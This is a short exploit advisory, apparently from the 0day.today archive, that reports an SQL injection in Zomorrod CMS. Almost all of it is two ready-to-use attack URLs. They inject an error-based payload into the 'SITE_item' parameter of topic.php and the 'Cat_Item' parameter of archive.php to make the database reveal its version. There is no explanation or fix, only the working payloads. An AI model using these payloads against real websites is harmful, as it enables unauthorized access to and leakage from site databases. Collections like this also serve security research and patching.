id: 10814
date: 02/09/2010
title: Zomorrod Cms Sql Injection Vulnerability
author: Securitylab
cves: 

========================================
Zomorrod Cms Sql Injection Vulnerability
========================================

#################################################################
# Application Info:
# Name: Zomorrod Cms
# Vendor: http://www.zomorrod.net
#################################################################
Vulnerability:
http://site.ir/topic.php?SITE_item=54'+and+convert(int,@@version)='54
http://site.ir/archive.php?Cat_Item=54'+and+convert(int,@@version)='54
#################################################################




#  0day.today [2023-03-24]  #